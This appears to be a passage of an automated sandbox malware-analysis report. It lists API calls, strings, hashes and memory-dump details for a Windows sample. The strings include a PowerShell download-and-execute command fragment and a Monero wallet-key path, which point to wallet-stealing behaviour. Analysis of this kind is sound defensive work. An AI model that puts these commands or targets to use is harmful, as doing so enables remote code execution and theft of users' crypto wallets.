                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00722D85
                                  Strings
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00722D04
                                  • ')", xrefs: 00722CB3
                                  • <, xrefs: 00722D39
                                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00722CC4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  • API String ID: 3031569214-898575020
                                  • Opcode ID: 3c3a9f8e4c7585745e3c2b0a2db62273a375c56425f3247cc300312467788e67
                                  • Instruction ID: 5e52f8cfe2f45346318dfed675feb8dba79b28660a480553df35cf37b97e2bfb
                                  • Opcode Fuzzy Hash: 3c3a9f8e4c7585745e3c2b0a2db62273a375c56425f3247cc300312467788e67
                                  • Instruction Fuzzy Hash: 7641DF71D10218EBDB15FFA0E89ABDDB774AF14300F404169F106A7192DF786A4ACF92
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00719F41
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: lstrcpy$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 4171519190-1096346117
                                  • Opcode ID: 0ba0f3150525cc17db3314fca0f69f5c14bc3ce832af1516563b2466de40b3d7
                                  • Instruction ID: 04babf74fffc4969d4eebf33be43e10a055c41b6ff6c91bf0dfb2044e1b8b397
                                  • Opcode Fuzzy Hash: 0ba0f3150525cc17db3314fca0f69f5c14bc3ce832af1516563b2466de40b3d7
                                  • Instruction Fuzzy Hash: 38612371A10258EFDB14EFA8DC9AFED77B5AF44300F408118F90A5F191EB786A45CB92
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,0122E8C0,00000000,00020119,?), ref: 007240F4
                                  • RegQueryValueExA.ADVAPI32(?,0122F040,00000000,00000000,00000000,000000FF), ref: 00724118
                                  • RegCloseKey.ADVAPI32(?), ref: 00724122
                                  • lstrcat.KERNEL32(?,00000000), ref: 00724147
                                  • lstrcat.KERNEL32(?,0122F058), ref: 0072415B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 690832082-0
                                  • Opcode ID: 6d1a34aaabd4f62e3d2f86e25ebfca92701a230168980c546b60a193fdc851b2
                                  • Instruction ID: 6fe56f7d6d3c1518bf25f8f3d7fa0d7b43a31bb8e605aad8f4cdcf3cba97b7cf
                                  • Opcode Fuzzy Hash: 6d1a34aaabd4f62e3d2f86e25ebfca92701a230168980c546b60a193fdc851b2
                                  • Instruction Fuzzy Hash: 7D418BB6D10208ABDB14EBA0EC5AFFE777DAB4C300F404658B71557181EA795B888BD2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00727E37
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00727E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,0121CC70,00000000,00020119,?), ref: 00727E5E
                                  • RegQueryValueExA.ADVAPI32(?,0122E860,00000000,00000000,000000FF,000000FF), ref: 00727E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00727E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: c91cad2f2ba3713e1e544366178d1aac1673cff5a7c1ab33bcb432b93dff9a5f
                                  • Instruction ID: c36658bca37337604a4243a0ebacd37743a6d98b14f40e79b2ea15ac98d8882e
                                  • Opcode Fuzzy Hash: c91cad2f2ba3713e1e544366178d1aac1673cff5a7c1ab33bcb432b93dff9a5f
                                  • Instruction Fuzzy Hash: 80114FB1A58305EBD714CF95ED49F7BBBB8FB08711F104259F605A7290D7785800DBA1
                                  APIs
                                  • StrStrA.SHLWAPI(0122EE90,?,?,?,0072140C,?,0122EE90,00000000), ref: 0072926C
                                  • lstrcpyn.KERNEL32(0095AB88,0122EE90,0122EE90,?,0072140C,?,0122EE90), ref: 00729290
                                  • lstrlen.KERNEL32(?,?,0072140C,?,0122EE90), ref: 007292A7
                                  • wsprintfA.USER32 ref: 007292C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: 7394699ac05e4c420f426a3766280587c56a9378078d4dc6a8122af9bd7983b7
                                  • Instruction ID: 47574b28fa524e03fdda9268152e66b24dcb51fdfe2cc4b9a90ef5ac0dfff4d8
                                  • Opcode Fuzzy Hash: 7394699ac05e4c420f426a3766280587c56a9378078d4dc6a8122af9bd7983b7
                                  • Instruction Fuzzy Hash: 93011E75904208FFCB04DFEDD984EAE7BB9FB48365F148248F9098B204C635AA40DBD5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007112B4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007112BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 007112D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 007112F5
                                  • RegCloseKey.ADVAPI32(?), ref: 007112FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: e0672cbd6dd47d566ff037faa7f0c8dd77c614faff900d81ccd29dfa627675f5
                                  • Instruction ID: 5833e2932c3902648962ce664ecb7c1e6f0f794771c4ed4429f22fd5c5cb17e6
                                  • Opcode Fuzzy Hash: e0672cbd6dd47d566ff037faa7f0c8dd77c614faff900d81ccd29dfa627675f5
                                  • Instruction Fuzzy Hash: EA011DB9A54308BBDB00DFE5DC49FAEB7B8EB48701F008259FB0597280D6749A019B55
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: bbeead30ad97894ed35688000ef4ece4ab0106105735e42421d09b75ca3c0f58
                                  • Instruction ID: f9644afa49cbc89ef35598412224580adcefec2d66ad66e1a636c7505ea5321c
                                  • Opcode Fuzzy Hash: bbeead30ad97894ed35688000ef4ece4ab0106105735e42421d09b75ca3c0f58
                                  • Instruction Fuzzy Hash: 1D41E9B15007AC9EDB228B249D85FFF7BEC9F55704F1444E8D9C686182E279AB84CF60
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00726663
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00726726
                                  • ExitProcess.KERNEL32 ref: 00726755
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: f067ef7402291f563117328891aa4be691421f1cf78b13f41e7574d8f80f93db
                                  • Instruction ID: 823dfc3ef9e9dcc4d4bf449886fad9407d06856a936a03fa450a5667dd71a88d
                                  • Opcode Fuzzy Hash: f067ef7402291f563117328891aa4be691421f1cf78b13f41e7574d8f80f93db
                                  • Instruction Fuzzy Hash: 52311CB1811228EBDB55EB90EC96FDD7778AF08300F404199F20566191DF786B89CF5A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00730E28,00000000,?), ref: 0072882F
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728836
                                  • wsprintfA.USER32 ref: 00728850
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: 0c64ba58ab1ca1bc4adbfbff0e9b2326d500fa141f33593a47b7ec47776b04cb
                                  • Instruction ID: 3acf1648086938a87bb6f05387ac795bd6cac6c39120f87e249593fa829c979b
                                  • Opcode Fuzzy Hash: 0c64ba58ab1ca1bc4adbfbff0e9b2326d500fa141f33593a47b7ec47776b04cb
                                  • Instruction Fuzzy Hash: B3214FB1E54308AFDB04DF95DD49FAEBBB8FB48701F104219F605A7280C779A900DBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0072951E,00000000), ref: 00728D5B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00728D62
                                  • wsprintfW.USER32 ref: 00728D78
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesswsprintf
                                  • String ID: %hs
                                  • API String ID: 769748085-2783943728
                                  • Opcode ID: def812b199d311e078382f59cb7289be14fc4395300007f8e7b9e2779b11fc9f
                                  • Instruction ID: e4d352cfc832f518b17127bb901b94519234cbe68fcfcbb3b9ceb9ecdb944013
                                  • Opcode Fuzzy Hash: def812b199d311e078382f59cb7289be14fc4395300007f8e7b9e2779b11fc9f
                                  • Instruction Fuzzy Hash: 04E08CB0A54308BBD700DB95DC0AE6977B8EB08702F000294FE0987280DA759E10AB9A
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 0071A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 0071A6BC
                                    • Part of subcall function 0072A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0072A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071A743
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: c558548924308ea99b56447e327d0d8ba2704b3231b4db6dc7664f6e2d054d35
                                  • Instruction ID: 00c3c4a6301c95dd977267f98cc89654a2844cda2bdac9dd510a71c2d39730b4
                                  • Opcode Fuzzy Hash: c558548924308ea99b56447e327d0d8ba2704b3231b4db6dc7664f6e2d054d35
                                  • Instruction Fuzzy Hash: 1BE1C572810118EBDB05FBA4EC9AEEE7378BF14300F508569F51776091EF386A49CB66
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071D481
                                  • lstrlen.KERNEL32(00000000), ref: 0071D698
                                  • lstrlen.KERNEL32(00000000), ref: 0071D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071D72B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                   • Associated: 00000000.00000002.1742543481.0000000000710000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007CD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.00000000007F2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742561471.000000000095A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BD0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BF3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742705151.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1742935245.0000000000C0A000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743041698.0000000000DA4000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1743055617.0000000000DA5000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_710000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 1b0be82e9be2f983f305f5b7f73b6a179270bee9673fa1d2b82c918efeb0345b
                                  • Instruction ID: f79e2b1c9f31a234ef3229e9bcf87702a78ccf683cba0e93d15c536dbc31db0b
                                  • Opcode Fuzzy Hash: 1b0be82e9be2f983f305f5b7f73b6a179270bee9673fa1d2b82c918efeb0345b
                                  • Instruction Fuzzy Hash: E9912672810128EBDB05FBA4EC9ADEE7378EF14300F504568F50776092EF386A49CB66
                                  APIs
                                    • Part of subcall function 0072A740: lstrcpy.KERNEL32(00730E17,00000000), ref: 0072A788
                                    • Part of subcall function 0072A9B0: lstrlen.KERNEL32(?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 0072A9C5
                                    • Part of subcall function 0072A9B0: lstrcpy.KERNEL32(00000000), ref: 0072AA04
                                    • Part of subcall function 0072A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0072AA12
                                    • Part of subcall function 0072A8A0: lstrcpy.KERNEL32(?,00730E17), ref: 0072A905
                                    • Part of subcall function 00728B60: GetSystemTime.KERNEL32(00730E1A,0122AFB0,007305AE,?,?,007113F9,?,0000001A,00730E1A,00000000,?,01229D30,?,\Monero\wallet.keys,00730E17), ref: 00728B86
                                    • Part of subcall function 0072A920: lstrcpy.KERNEL32(00000000,?), ref: 0072A972
                                    • Part of subcall function 0072A920: lstrcat.KERNEL32(00000000), ref: 0072A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0071D801
                                  • lstrlen.KERNEL32(00000000), ref: 0071D99F
                                  • lstrlen.KERNEL32(00000000), ref: 0071D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 0071DA32
                                  Memory Dump Source
